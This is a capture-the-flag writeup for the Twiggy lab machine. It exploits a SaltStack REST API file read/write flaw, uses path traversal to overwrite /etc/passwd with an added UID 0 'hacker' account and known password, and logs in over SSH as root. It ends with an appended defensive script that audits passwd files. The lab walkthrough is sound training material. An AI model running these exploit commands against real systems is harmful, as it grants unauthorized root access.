# Proving Grounds Practice: Twiggy

Proving Grounds Practice - Twiggy CTF writeup.

### Nmap

```sh
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
53/tcp   open  domain  NLnet Labs NSD
80/tcp   open  http    nginx 1.16.1
4505/tcp open  zmtp    ZeroMQ ZMTP 2.0
4506/tcp open  zmtp    ZeroMQ ZMTP 2.0
8000/tcp open  http    nginx 1.16.1
```

### Web

#### PORT: 80

![img](/files/NtlJB8kX27yi00q9WkvQ)

#### PORT: 8000

![img](/files/TnOvsXHS0Bgf315WgW71)

The SaltStack Salt REST API is running.

![img](/files/BZxtxeqT1RkOBAHEJJc1)

SaltStack is vulnerable to [Saltstack 3000.1 - Remote Code Execution](https://www.exploit-db.com/exploits/48421).

### Exploitation

```sh
python exploit.py --master 192.168.174.62 --read /etc/passwd
```

![img](/files/YxRX5Db180WUpxuC0Nh5)

I was unable to obtain a reverse shell using the `--exec` option of the exploit, but we can create our own user account and add it to the `/etc/passwd` file.

#### Create new user

```sh
openssl passwd hacked
$1$iBeMKMaU$.O3VYqCZxUvapPL.OQ97/1
```

`hacked` is the password.

Add the following line to the `/etc/passwd` content we extracted from the target machine.

```
hacker:$1$iBeMKMaU$.O3VYqCZxUvapPL.OQ97/1:0:0:root:/root:/bin/bash
```

**Writing /etc/passwd file**

```sh
python exploit.py --master 192.168.174.62 --upload-src passwd --upload-dest ../../../../../../../../../../etc/passwd
```

![img](/files/2xWRgyJkNVrsubkTY88k)

**Verify the user existence**

![img](/files/LwpWpaI2nkDSVGy1UBmb)

SSH to the target machine with the username `hacker` and the password `hacked`.

![img](/files/v7dwE5O15OGdaHDSz6LN)

**Root Obtained**
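
A defender-side check for the change made above, as an added example that is not part of the original writeup: it flags UID 0 accounts other than `root` and password hashes stored directly in a passwd-format file. The function names `audit_passwd` and `sample_passwd` are assumptions, and the sample file is constructed apart from the `hacker` line taken from this page.

```sh
#!/bin/sh
# Added example (not from the original writeup).
# Audits a passwd-format file for the two anomalies the injected entry shows:
#   1. a UID 0 account whose name is not "root"
#   2. a password hash (or empty password) in field 2 instead of the
#      "x" shadow placeholder or a "*" / "!" locked marker
# Usage: audit_passwd [file|-]   (defaults to /etc/passwd, "-" reads stdin)
# Exit status: 0 if nothing was flagged, 1 otherwise.
audit_passwd() {
    awk -F: '
        /^[ \t]*#/ || /^[ \t]*$/ { next }      # skip comments and blank lines
        NF != 7 { printf "MALFORMED line %d\n", NR; bad = 1; next }
        $3 == 0 && $1 != "root" {              # extra superuser account
            printf "UID0 %s\n", $1; bad = 1
        }
        $2 != "x" && $2 !~ /^[*!]/ {           # credential kept outside /etc/shadow
            if ($2 == "") printf "EMPTYPW %s\n", $1
            else          printf "INLINEHASH %s\n", $1
            bad = 1
        }
        END { exit bad }
    ' "${1:-/etc/passwd}"
}

# Constructed sample: three ordinary entries plus the line added in this writeup.
# The heredoc delimiter is quoted so the "$1$..." hash is not expanded by the shell.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
hacker:$1$iBeMKMaU$.O3VYqCZxUvapPL.OQ97/1:0:0:root:/root:/bin/bash
EOF
}

# Demo run on the constructed sample; findings are printed one per line.
sample_passwd | audit_passwd - || true
```

Run `audit_passwd` with no argument on a host to check the live `/etc/passwd`; a non-zero exit status makes it easy to wire into a scheduled integrity check.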

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).


